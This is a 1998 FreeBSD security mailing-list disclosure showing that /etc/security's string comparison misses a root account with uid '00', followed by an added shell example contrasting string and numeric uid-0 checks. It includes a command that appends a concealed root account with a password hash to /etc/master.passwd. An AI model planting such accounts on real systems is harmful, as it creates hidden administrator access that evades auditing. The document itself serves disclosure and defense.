Date: Wed, 8 Jul 1998 05:23:45 +0200 (CEST)
From: Michal Listos
To: security@FreeBSD.ORG
Subject: /etc/security weakness

Hi,

While browsing through /etc/security I've discovered an ancient security hole. I thought it was secured in 2.1.x, but it seems that I was wrong. /etc/security uses string mode comparison when checking for root accounts. It should use binary instead, shouldn't it?

[783](root@Amnesiac ~)# echo 'hoot:$1$8rSeV$Vibbz.ILt9JsZZouefmnQ1:00:0::0:0:hidden root account:/root/:/bin/sh' >> /etc/master.passwd
[784](root@Amnesiac ~)# awk 'BEGIN {FS=":"} $3=="0" {print $1,$3}' /etc/master.passwd
root 0
jrewt 0
toor 0
[786](root@Amnesiac ~)#

--
Michal
"some people's lives almost entirely through computers."
- never had time to leave the machine to see one
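Added example, not part of the original message and not the actual /etc/security script: the string comparison quoted above next to one possible numeric check, run over a constructed master.passwd-style sample. The function names, the sample accounts other than root, toor and hoot, and the choice of an all-digit test plus forced numeric conversion are assumptions made for this illustration.

```shell
#!/bin/sh
# Constructed sample in master.passwd layout (name:pw:uid:gid:class:...).
# Password fields are placeholders; this is not a real system file.
sample_passwd() {
cat <<'EOF'
root:*:0:0::0:0:superuser:/root:/bin/csh
toor:*:0:0::0:0:alternate superuser:/root:
hoot:*:00:0::0:0:hidden root account:/root/:/bin/sh
daemon:*:1:1::0:0:system account:/root:/sbin/nologin
ten:*:10:10::0:0:uid ten, must not match:/home/ten:/bin/sh
junk:*:0x:20::0:0:malformed uid, must not match:/home/junk:/bin/sh
user1:*:1001:1001::0:0:ordinary user:/home/user1:/bin/sh
EOF
}

# String comparison, as in the awk command in the message:
# the field "00" is not the string "0", so hoot goes unreported.
uid0_string() {
    awk 'BEGIN {FS=":"} $3 == "0" {print $1}'
}

# Numeric comparison: accept only all-digit uid fields, then add 0 to
# force a number, so "0", "00", "000" all compare equal to zero.
uid0_numeric() {
    awk 'BEGIN {FS=":"} $3 ~ /^[0-9]+$/ && $3 + 0 == 0 {print $1}'
}

# Accounts that are uid 0 numerically but escape the string check.
uid0_missed() {
    awk 'BEGIN {FS=":"}
         $3 ~ /^[0-9]+$/ && $3 + 0 == 0 && $3 != "0" {print $1, $3}'
}

echo "string check:  $(sample_passwd | uid0_string | tr '\n' ' ')"
echo "numeric check: $(sample_passwd | uid0_numeric | tr '\n' ' ')"
echo "missed:        $(sample_passwd | uid0_missed)"
```

Each function reads passwd-format lines on standard input, so the same checks can be pointed at a copy of a real file instead of the sample.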